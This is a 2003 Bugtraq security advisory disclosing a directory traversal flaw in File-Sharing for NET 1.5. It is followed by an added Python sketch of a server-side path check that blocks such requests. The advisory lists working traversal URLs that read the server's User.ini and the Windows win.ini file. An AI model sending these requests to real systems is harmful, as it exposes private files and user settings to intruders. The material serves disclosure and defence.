Message-ID: <20031003131428.1897.qmail@sf-www2-symnsj.securityfocus.com>
Date: 3 Oct 2003 13:14:28 -0000
From: Bahaa Naamneh <b_naamneh@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Minihttpserver File-Sharing for NET Directory Traversal Vulnerability
Affected Systems: File-Sharing for NET
Version: 1.5 (and possibly earlier versions)
Vendor: Minihttpserver - http://www.minihttpserver.net
Issue: Directory Traversal Vulnerability
Released: 2 October 2003
Introduction:
=============
"File Sharing for net is a complete, secure web server that shares
your business documents and files over the web: remote users only
need browsers to view your files. Share, transfer files securely with
colleagues."
- Vendor's Description
[ http://www.minihttpserver.net ]
Details:
========
File-Sharing for NET has a directory traversal vulnerability. Using
the string '../' or '..\' in a URL, an attacker can gain read access
to any file outside of the intended web-published file system
directory.
http://[target]/../../../existing_file
http://[target]\..\..\..\existing_file
Examples:
---------
http://127.0.0.1/../../../ Program Files/FileSharing for NET/User.ini
http://127.0.0.1/../../../windows/win.ini
Vendor status:
==============
The vendor has been informed, and they are fixing this bug.
The updated version, when released, can be downloaded from:
http://www.minihttpserver.net/fbbs.zip
Discovered by/Credit:
=====================
Bahaa Naamneh
b_naamneh@...mail.com
http://www.bsecurity.tk
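
Added example, not part of the original advisory and not the vendor's code: a sketch of the server-side check that rejects the '../' and '..\' requests described under Details, by resolving the requested path with Windows path rules and confirming it stays under the published directory. It goes slightly beyond the advisory by also decoding percent-encoded dots and rejecting drive-qualified paths; WEB_ROOT and resolve_request_path are hypothetical names chosen for illustration.

```python
import ntpath                      # Windows path semantics on any host OS
from urllib.parse import unquote

WEB_ROOT = r"C:\Shared"            # assumed published directory (hypothetical)


def resolve_request_path(url_path, web_root=WEB_ROOT):
    """Map a URL path to a file under web_root.

    Returns the normalized absolute path, or None when the request
    would resolve outside the published directory.
    """
    decoded = unquote(url_path)    # turns %2e%2e into '..' before checking
    if "\x00" in decoded:
        return None

    # The advisory shows both separators working, so treat them alike.
    relative = decoded.replace("/", "\\").lstrip("\\")

    # A drive letter or UNC prefix would make join() discard the root.
    drive, _ = ntpath.splitdrive(relative)
    if drive:
        return None

    root = ntpath.normpath(web_root)
    # normpath collapses every '..' segment, so the comparison below is
    # made on the path the file system would actually open.
    candidate = ntpath.normpath(ntpath.join(root, relative))

    # Windows paths are case-insensitive: compare case-folded forms, and
    # require a separator after the root so C:\Shared2 does not match.
    root_cmp = ntpath.normcase(root)
    cand_cmp = ntpath.normcase(candidate)
    if cand_cmp != root_cmp and not cand_cmp.startswith(root_cmp + "\\"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests, including the forms from the advisory.
    for req in ("/docs/report.txt",
                "/../../../windows/win.ini",
                "\\..\\..\\..\\windows\\win.ini",
                "/%2e%2e/%2e%2e/windows/win.ini"):
        print(f"{req!r:40} -> {resolve_request_path(req)}")
```

The check is made on the normalized result rather than by searching the raw URL for '..', so a request such as /docs/../report.txt that stays inside the root is still served.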